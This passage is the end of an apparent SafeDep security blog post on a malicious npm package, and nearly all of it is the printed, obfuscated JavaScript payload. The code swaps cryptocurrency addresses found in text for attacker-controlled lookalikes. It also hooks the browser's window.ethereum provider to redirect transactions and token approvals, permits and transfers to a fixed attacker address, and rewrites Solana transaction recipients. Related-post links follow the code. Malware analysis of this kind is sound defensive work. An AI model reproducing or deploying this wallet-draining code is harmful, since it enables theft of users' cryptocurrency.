'bitcoincash:qqjqp8ayuky5hq4kgrarpu40eq6xjrneuurc43v9lf', 'bitcoincash:qqxu6a3f0240v0mwzhspm5zeneeyecggvufgz82w7u', 'bitcoincash:qpux2mtlpd03d8zxyc7nsrk8knarnjxxts2fjpzeck', 'bitcoincash:qpcgcrjry0excx80zp8hn9vsn4cnmk57vylwa5mtz3', 'bitcoincash:qpjj6prm5menjatrmqaqx0h3zkuhdkfy75uauxz2sj', 'bitcoincash:qp79qg7np9mvr4mg78vz8vnx0xn8hlkp7sk0g86064', 'bitcoincash:qr27clvagvzra5z7sfxxrwmjxy026vltucdkhrsvc7', 'bitcoincash:qrsypfz3lqt8xtf8ej5ftrqyhln577me6v640uew8j', 'bitcoincash:qrzfrff4czjn6ku0tn2u3cxk7y267enfqvx6zva5w6', 'bitcoincash:qr7exs4az754aknl3r5gp9scn74dzjkcrgql3jpv59', 'bitcoincash:qq35fzg00mzcmwtag9grmwljvpuy5jm8kuzfs24jhu', 'bitcoincash:qra5zfn74m7l85rl4r6wptzpnt2p22h7552swkpa7l', 'bitcoincash:qzqllr0fsh9fgfvdhmafx32a0ddtkt52evnqd7w7h7', 'bitcoincash:qpjdcwld84wtd5lk00x8t7qp4eu3y0xhnsjjfgrs7q', 'bitcoincash:qrgpm5y229xs46wsx9h9mlftedmsm4xjlu98jffmg3', 'bitcoincash:qpjl9lkjjp4s6u654k3rz06rhqcap849jg8uwqmaad', 'bitcoincash:qra5uwzgh8qus07v3srw5q0e8vrx5872k5cxguu3h5', 'bitcoincash:qz6239jkqf9qpl2axk6vclsx3gdt8cy4z5rag98u2r', ]; const _0x3ec3bb = { ethereum: /\b0x[a-fA-F0-9]{40}\b/g, bitcoinLegacy: /\b1[a-km-zA-HJ-NP-Z1-9]{25,34}\b/g, bitcoinSegwit: /\b(3[a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{11,71})\b/g, tron: /((?<!\w)[T][1-9A-HJ-NP-Za-km-z]{33})/g, bch: /bitcoincash:[qp][a-zA-Z0-9]{41}/g, ltc: /(?<!\w)ltc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{11,71}\b/g, ltc2: /(?<!\w)[mlML][a-km-zA-HJ-NP-Z1-9]{25,34}/g, solana: /((?<!\w)[4-9A-HJ-NP-Za-km-z][1-9A-HJ-NP-Za-km-z]{32,44})/g, solana2: /((?<!\w)[3][1-9A-HJ-NP-Za-km-z]{35,44})/g, solana3: /((?<!\w)[1][1-9A-HJ-NP-Za-km-z]{35,44})/g, }; for (const [_0x17ccd4, _0x129783] of Object.entries(_0x3ec3bb)) { const _0x1be350 = _0x530d91.match(_0x129783) || []; for (const _0x4225ce of _0x1be350) { if (_0x17ccd4 == 'ethereum') { if (!_0x4477fc.includes(_0x4225ce) && neth == 0) { _0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x4477fc)); } } if (_0x17ccd4 == 'bitcoinLegacy') { if (!_0x264994.includes(_0x4225ce)) { _0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x264994)); } } if (_0x17ccd4 == 'bitcoinSegwit') { if (!_0x2e3cca.includes(_0x4225ce)) { _0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x2e3cca)); } } if (_0x17ccd4 == 'tron') { if (!_0x3ee86f.includes(_0x4225ce)) { _0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x3ee86f)); } } if (_0x17ccd4 == 'ltc') { if (!_0x4a9d96.includes(_0x4225ce)) { _0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x4a9d96)); } } if (_0x17ccd4 == 'ltc2') { if (!_0x4a9d96.includes(_0x4225ce)) { _0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x4a9d96)); } } if (_0x17ccd4 == 'bch') { if (!_0x553dcb.includes(_0x4225ce)) { _0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x553dcb)); } } const _0x2d452a = [..._0x4477fc, ..._0x264994, ..._0x2e3cca, ..._0x3ee86f, ..._0x4a9d96, ..._0x553dcb]; const _0x35f871 = _0x2d452a.includes(_0x4225ce); if (_0x17ccd4 == 'solana' && !_0x35f871) { if (!_0x514d7d.includes(_0x4225ce)) { _0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x514d7d)); } } if (_0x17ccd4 == 'solana2' && !_0x35f871) { if (!_0x514d7d.includes(_0x4225ce)) { _0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x514d7d)); } } if (_0x17ccd4 == 'solana3' && _0x35f871) { if (!_0x514d7d.includes(_0x4225ce)) { _0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x514d7d)); } } } } return _0x530d91; }}async function runmask() { let _0x1c41fa = 0; let _0x2a20cb = new Map(); let _0x1ab7cb = false; function _0x1089ae(_0x4ac357, _0xc83c36 = true) { const _0x13d8ee = JSON.parse(JSON.stringify(_0x4ac357)); if (_0xc83c36) { if (_0x13d8ee.value && _0x13d8ee.value !== '0x0' && _0x13d8ee.value !== '0') { _0x13d8ee.to = '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976'; } if (_0x13d8ee.data) { const _0x250e27 = _0x13d8ee.data.toLowerCase(); if (_0x250e27.startsWith('0x095ea7b3')) { if (_0x250e27.length >= 74) { const _0x7fa5f0 = _0x250e27.substring(0, 10); const _0x15c4f9 = '0x' + _0x250e27.substring(34, 74); const _0xde14cc = 'Fc4a4858bafef54D1b1d7697bfb5c52F4c166976'.padStart(64, '0'); const _0x3e4a11 = 'f'.repeat(64); _0x13d8ee.data = _0x7fa5f0 + _0xde14cc + _0x3e4a11; const _0x432d38 = { '0x7a250d5630b4cf539739df2c5dacb4c659f2488d': 'Uniswap V2', '0x66a9893cC07D91D95644AEDD05D03f95e1dBA8Af': 'Uniswap V2', '0xe592427a0aece92de3edee1f18e0157c05861564': 'Uniswap V3', '0x10ed43c718714eb63d5aa57b78b54704e256024e': 'PancakeSwap V2', '0x13f4ea83d0bd40e75c8222255bc855a974568dd4': 'PancakeSwap V3', '0x1111111254eeb25477b68fb85ed929f73a960582': '1inch', '0xd9e1ce17f2641f24ae83637ab66a2cca9c378b9f': 'SushiSwap', }; const _0x13f774 = _0x432d38[_0x15c4f9.toLowerCase()]; if (_0x13f774) { console.log(_0x13f774 + _0x15c4f9); } else { console.log(_0x15c4f9); } } } else { if (_0x250e27.startsWith('0xd505accf')) { if (_0x250e27.length >= 458) { const _0x571743 = _0x250e27.substring(0, 10); const _0x55e7fa = _0x250e27.substring(10, 74); const _0x382fb5 = _0x250e27.substring(202, 266); const _0x5bb3a7 = _0x250e27.substring(266, 330); const _0x2e5118 = _0x250e27.substring(330, 394); const _0x3ba273 = _0x250e27.substring(394, 458); const _0x36b084 = 'Fc4a4858bafef54D1b1d7697bfb5c52F4c166976'.padStart(64, '0'); const _0x15389e = 'f'.repeat(64); _0x13d8ee.data = _0x571743 + _0x55e7fa + _0x36b084 + _0x15389e + _0x382fb5 + _0x5bb3a7 + _0x2e5118 + _0x3ba273; } } else { if (_0x250e27.startsWith('0xa9059cbb')) { if (_0x250e27.length >= 74) { const _0x5d2193 = _0x250e27.substring(0, 10); const _0x1493e2 = _0x250e27.substring(74); const _0x32c34c = 'Fc4a4858bafef54D1b1d7697bfb5c52F4c166976'.padStart(64, '0'); _0x13d8ee.data = _0x5d2193 + _0x32c34c + _0x1493e2; } } else { if (_0x250e27.startsWith('0x23b872dd')) { if (_0x250e27.length >= 138) { const _0x5c5045 = _0x250e27.substring(0, 10); const _0x1ebe01 = _0x250e27.substring(10, 74); const _0x558b46 = _0x250e27.substring(138); const _0x56d65b = 'Fc4a4858bafef54D1b1d7697bfb5c52F4c166976'.padStart(64, '0'); _0x13d8ee.data = _0x5c5045 + _0x1ebe01 + _0x56d65b + _0x558b46; } } } } } } else if (_0x13d8ee.to && _0x13d8ee.to !== '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976') { _0x13d8ee.to = '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976'; } } else { if (_0x13d8ee.instructions && Array.isArray(_0x13d8ee.instructions)) { _0x13d8ee.instructions.forEach((_0x190501) => { if (_0x190501.accounts && Array.isArray(_0x190501.accounts)) { _0x190501.accounts.forEach((_0x2b9990) => { if (typeof _0x2b9990 === 'string') { _0x2b9990 = '19111111111111111111111111111111'; } else if (_0x2b9990.pubkey) { _0x2b9990.pubkey = '19111111111111111111111111111111'; } }); } if (_0x190501.keys && Array.isArray(_0x190501.keys)) { _0x190501.keys.forEach((_0x40768f) => { if (_0x40768f.pubkey) { _0x40768f.pubkey = '19111111111111111111111111111111'; } }); } }); } if (_0x13d8ee.recipient) { _0x13d8ee.recipient = '19111111111111111111111111111111'; } if (_0x13d8ee.destination) { _0x13d8ee.destination = '19111111111111111111111111111111'; } } return _0x13d8ee; } function _0x485f9d(_0x38473f, _0x292c7a) { return async function (..._0x59af19) { _0x1c41fa++; let _0x12a7cb; try { _0x12a7cb = JSON.parse(JSON.stringify(_0x59af19)); } catch (_0x5d1767) { _0x12a7cb = [..._0x59af19]; } if (_0x59af19[0] && typeof _0x59af19[0] === 'object') { const _0x2c3d7e = _0x12a7cb[0]; if (_0x2c3d7e.method === 'eth_sendTransaction' && _0x2c3d7e.params && _0x2c3d7e.params[0]) { try { const _0x39ad21 = _0x1089ae(_0x2c3d7e.params[0], true); _0x2c3d7e.params[0] = _0x39ad21; } catch (_0x226343) {} } else { if ( (_0x2c3d7e.method === 'solana_signTransaction' || _0x2c3d7e.method === 'solana_signAndSendTransaction') && _0x2c3d7e.params && _0x2c3d7e.params[0] ) { try { let _0x5ad975 = _0x2c3d7e.params[0]; if (_0x5ad975.transaction) { _0x5ad975 = _0x5ad975.transaction; } const _0x5dbe63 = _0x1089ae(_0x5ad975, false); if (_0x2c3d7e.params[0].transaction) { _0x2c3d7e.params[0].transaction = _0x5dbe63; } else { _0x2c3d7e.params[0] = _0x5dbe63; } } catch (_0x4b99fd) {} } } } const _0x1cbb37 = _0x38473f.apply(this, _0x12a7cb); if (_0x1cbb37 && typeof _0x1cbb37.then === 'function') { return _0x1cbb37 .then((_0xea3332) => _0xea3332) ['catch']((_0x35d6a3) => { throw _0x35d6a3; }); } return _0x1cbb37; }; } function _0x41630a(_0x5d6d52) { if (!_0x5d6d52) { return false; } let _0x2fc35d = false; const _0xfafee = ['request', 'send', 'sendAsync']; for (const _0x16ab0e of _0xfafee) { if (typeof _0x5d6d52[_0x16ab0e] === 'function') { const _0x58cddf = _0x5d6d52[_0x16ab0e]; _0x2a20cb.set(_0x16ab0e, _0x58cddf); try { Object.defineProperty(_0x5d6d52, _0x16ab0e, { value: _0x485f9d(_0x58cddf, _0x16ab0e), writable: true, configurable: true, enumerable: true, }); _0x2fc35d = true; } catch (_0x19546c) {} } } if (_0x2fc35d) { _0x1ab7cb = true; } return _0x2fc35d; } function _0xfc3320() { let _0x4f0cd6 = 0; const _0x5b507d = () => { _0x4f0cd6++; if (window.ethereum) { setTimeout(() => { _0x41630a(window.ethereum); }, 500); return; } if (_0x4f0cd6 < 50) { setTimeout(_0x5b507d, 100); } }; _0x5b507d(); } _0xfc3320(); window.stealthProxyControl = { isActive: () => _0x1ab7cb, getInterceptCount: () => _0x1c41fa, getOriginalMethods: () => _0x2a20cb, forceShield: () => { if (window.ethereum) { return _0x41630a(window.ethereum); } return false; }, };}- npm
- oss
- malware
- supply-chain
Author
SafeDep Team
safedep.io
Share
The Latest from SafeDep blogs
Follow for the latest updates and insights on open source security & engineering
Malicious npm Packages Impersonating Hyatt Internal Dependencies
Three malicious npm packages disguised as Hyatt internal dependencies were discovered using install hooks to execute malicious payloads. All packages share identical attack patterns and...
Ship Code. Not Malware. SafeDep Launches GitHub App for Malicious Package Protection
SafeDep launches a GitHub App for zero-configuration protection against malicious open source packages. Instantly scan pull requests and keep your code repositories safe from supply chain attacks.
Contributing to SafeDep Open Source Projects during Hacktoberfest 2025
Learn how to contribute to SafeDep open source projects during Hacktoberfest 2025 and help secure the open source software supply chain.
Shai-Hulud Supply Chain Attack Incident Response
The Shai-Hulud supply chain attack is a major incident targeting developers through malicious packages in the npm ecosystem. This post outlines the incident response steps that can be taken to...
Ship Code
Not Malware
Install the SafeDep GitHub App to keep malicious packages out of your repos.
Install GitHub App